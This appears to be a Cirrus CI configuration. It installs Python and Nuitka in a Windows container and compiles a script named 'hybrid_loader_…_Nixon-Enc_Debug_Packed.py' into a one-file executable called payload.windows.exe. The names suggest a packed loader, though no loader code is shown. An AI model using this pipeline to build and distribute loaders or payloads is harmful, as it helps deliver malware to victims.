
windows_task:
  windows_container:
    image: cirrusci/windowsservercore:2019
    cpu: 4
    memory: 8G
  env:
    PATH: C:\Python311;C:\Python311\Scripts;%PATH%
  install_script: 
    - choco install -y python --version 3.11.0 --params "/InstallDir:C:\Python311"
    - timeout 10
    - C:\Python311\python.exe -m pip install --upgrade pip
    - C:\Python311\python.exe -m pip install nuitka zstandard ordered-set requests websockets
  build_script:
    - C:\Python311\python.exe -m nuitka --standalone --onefile --assume-yes-for-downloads --output-filename=payload.exe hybrid_loader_l9xip67y_Nixon-Enc_Debug_Packed.py
    - move payload.exe payload.windows.exe
  binaries_artifacts:
    path: payload.windows.exe
